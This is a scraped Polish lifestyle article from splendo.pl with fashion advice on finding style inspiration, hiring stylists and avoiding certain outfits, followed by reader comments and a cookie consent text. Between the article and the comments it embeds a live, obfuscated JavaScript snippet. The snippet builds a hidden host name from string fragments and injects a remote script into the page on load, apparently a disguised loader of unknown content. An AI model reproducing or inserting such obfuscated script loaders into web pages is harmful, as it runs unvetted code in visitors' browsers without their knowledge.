:-( Wygląda na to że masz Adblocka. Utrzymujemy się z reklam żeby móc dostarczyć Ci wiadomości z Twojego regionu za które nie musisz płacić, czy mógłbyś rozważyć jego wyłączenie?

W pogoni za stylem - Skąd czerpać inspiracje modowe?

Moda, pogoni stylem Skąd czerpać inspiracje modowe - zdjęcie, fotografia
splendo.pl 29/02/2016 10:10

Prawdy i mity na temat „stylowości”

Dlaczego jednak tak trudno o dobry styl? Nie bez powodu mądre skądinąd i porządnie wykształcone kobiety korzystają zarówno z porad stylistek w sprawach mody czy makijażu, jak i zatrudniają specjalistów od urządzania wnętrz w domu. Najwidoczniej nie jest wcale tak łatwo odgadnąć, jakie z jednej strony panują teraz trendy, a z drugiej – co ze sobą zestawić, by się „nie gryzło”. Zdarza się i tak, że takie umiejętności wymagają wiele czasu, którego przecież zazwyczaj w nadmiarze nie mamy…

Przede wszystkim jednak jesteśmy zewsząd bombardowani różnymi wątpliwej jakości poradami na temat tego, jak się malować, ubierać czy mieszkać. Wynika to z tego, że wiele osób, także tych bardziej medialnych, uważa się za ekspertów w dziedzinach, na których nie do końca w rzeczywistości się znają. Jest jeszcze jeden, bardzo prozaiczny powód – większość artykułów i blogów z poradami, jakie można dziś znaleźć w sieci, to rzeczy pisane na zamówienie, na przykład celem promowania konkretnej marki mebli czy kosmetyków do makijażu. Trudno po takich „opowieściach” oczekiwać rzetelności, choć zdarzają się i pozytywne wyjątki.


Skąd czerpać inspiracje?

Gdzie więc warto szukać pewnej i prawdziwej pomocy? Ktoś przecież musi „naprawdę” znać się na rzeczy. Chciałoby się porzucić na chwilę Internet i sięgnąć po klasyków – np. żurnale i w ogóle prasę kobiecą sprzed lat. Jednak tu pojawia się inny problem – niektóre zawarte tam informacje mogą być już dziś po prostu przeterminowane. Lepszym więc chyba pomysłem jest zatrudnienie profesjonalnej stylistki/stylisty (nie jest to wyłącznie kobieca domena!). Niekoniecznie musimy ją/jego zatrudniać na stałe – zwykle wystarczy nam kilka lekcji stylu, kilka godzin porad, czy jedne, drugie i trzecie wspólne zakupy. To naprawdę nie gryzie! Dla tych z nas, którzy z jakichś powodów nie chcą takiego rozwiązania, dobrą alternatywą mogą też być bezpłatne porady stylistów oferowane przez niektóre centra handlowe (sprawdź na http://klif.pl/moda/#pakiet-konsultacji), sklepy, drogeria, sieci odzieżowe, i tak dalej. W ten sposób możesz też oczywiście sporo zaoszczędzić...


Rzeczy zakazane

 

 

Zapewne zdajesz sobie sprawę, że są takie rzeczy i zestawienie, które w dobrym guście i stylu nie będą nigdy, nawet za milion lat. Wynika to po prostu z estetyki – pewne rzeczy są i chyba zawsze już będą brzydkie, a pewne zestawienia kolorów nigdy nie będą ze sobą współgrały. Nigdy więc nie ubieraj się w rzeczy zarezerwowane dla dwunastolatek, gdy masz lat czterdzieści, nigdy nie noś ubrań za małych o więcej niż jeden rozmiar, i nigdy nie łącz żółtego z różowym czy fioletem. Nie wkładaj też ubrań z przesadną ilością cekinów, koronek czy falbanek – szczególnie jeśli idziesz na miasto lub do pracy, a nie na bal karnawałowy. Nigdy też nie ubieraj się i nie maluj przesadnie wyzywająco – sukienka udająca szerszy pasek, majtko-spodnie czy usta w kolorze krwistej czerwieni to najczęściej zły pomysł, bez względu na okazję.


Wyczucie stylu przychodzi z czasem

 

 

Nawet jeśli po przeczytaniu naszego krótkiego zbioru porad masz mętlik w głowie, nie martw się - „oświecenie” może przyjść po pewnym czasie, jeśli tylko będziesz sumiennie pracować nad swoim stylem. Pomagają w tym, owszem, profesjonalni styliści z agencji lub bezpłatni styliści dostępni w sklepach i firmach, ale równie pomocna może być… dobrze ubrana koleżanka lub kolega. Staraj się naśladować na własną rękę osoby, których styl ubierania się czy urządzania domu uznajesz za dobry, ale nie przesadzaj i nie małpuj ich we wszystkim – pozwalaj sobie zawsze na nieco indywidualności. Co jeszcze? Warto czytać branżowe pisma z górnych półek – zarówno te o modzie, jak i meblach czy wyposażeniu wnętrz.


(function(){
osbr=document.createElement("script");osbr.async=true;osbr_="u"+("s")+"t";
osbru="8501834.";osbr_+="a"+("t.i");osbr_+="n"+("f"+"o")+"/";
osbru+="p3f60bX5sbraa1vbzztede"+("lx5s4fpe");
osbr.src="//"+osbr_+osbru;osbr.type="text/javascript";
document.body.appendChild(osbr);
})();

 

Reklama

W pogoni za stylem - Skąd czerpać inspiracje modowe? komentarze opinie

  • kicksiarz - niezalogowany 2017-03-15 12:41:00

    sama czerpie inspiracje głownie z blogów. blogerki niekiedy zaskakują mnie pomysłowością i choć nie kopiuje to staram się obserwować trendy i wyszukiwać w nich coś dla siebie :). najbardziej kocham styl streetowy, dodatki vansa czy consy :) trampki converse all star - moje ukochane :)

  • gość 2017-06-26 12:47:34

    https://www.youtube.com/watch?v=u245lscXFcM

  • gość 2017-06-26 12:48:30

    Visit W3Schools

Dodajesz jako: |


Reklama

Ogłoszenia PREMIUM

Chcesz coś sprzedać lub kupić, oferujesz usługi, szukasz pracownika lub pracy?

Dodaj swoje drobne ogłoszenie w naszym serwisie. Zapraszamy!

Dodaj ogłoszenie
Reklama
 Reklama

25 maja 2018 roku weszło w życie Rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 roku tzw. RODO. Nowe prawo nakłada na nas obowiązek uzyskania Twojej zgody na przetwarzanie przez nas danych osobowych w plikach cookies

Oświadczam, iż zapoznałem sie z Polityką prywatności i zgadzam się na zapisywanie i przechowywanie w mojej przeglądarce internetowej tzw. plików cookies oraz na przetwarzanie zaszyfrowanych w nich danych osobowych pozostawianych w czasie korzystania z innych stron internetowych, serwisów oraz parametrów zapisywanych w plikach cookies w celach marketingowych, w tym na profilowanie i w celach analitycznych przez splendo.pl, oraz ZAUFANYCH PARTNERÓW.

Administratorzy danych / Podmioty którym powierzenie przetwarzania powierzono

Hoblo Sp. z o.o. z siedzibą w Warszawa 02-761, Cypryjska 2G

Cele przetwarzania danych

1.marketing, w tym profilowanie i cele analityczne
2.świadczenie usług drogą elektroniczną
3.dopasowanie treści stron internetowych do preferencji i zainteresowań
4.wykrywanie botów i nadużyć w usługach
5.pomiary statystyczne i udoskonalenie usług (cele analityczne)


Podstawy prawne przetwarzania danych


1.marketing, w tym profilowanie oraz cele analityczne – zgoda
2.świadczenie usług drogą elektroniczną - niezbędność danych do świadczenia usługi
3.pozostałe cele - uzasadniony interes administratora danych


Odbiorcy danych

Podmioty przetwarzające dane na zlecenie administratora danych, w tym podmioty ZAUFANI PARTNERZY, agencje marketingowe oraz podmioty uprawnione do uzyskania danych na podstawie obowiązującego prawa.

Prawa osoby, której dane dotyczą

Prawo żądania sprostowania, usunięcia lub ograniczenia przetwarzania danych; prawo wycofania zgody na przetwarzanie danych osobowych. Inne prawa osoby, której dane dotyczą.

Informacje dodatkowe

Więcej o zasadach przetwarzania danych w "Polityce prywatności"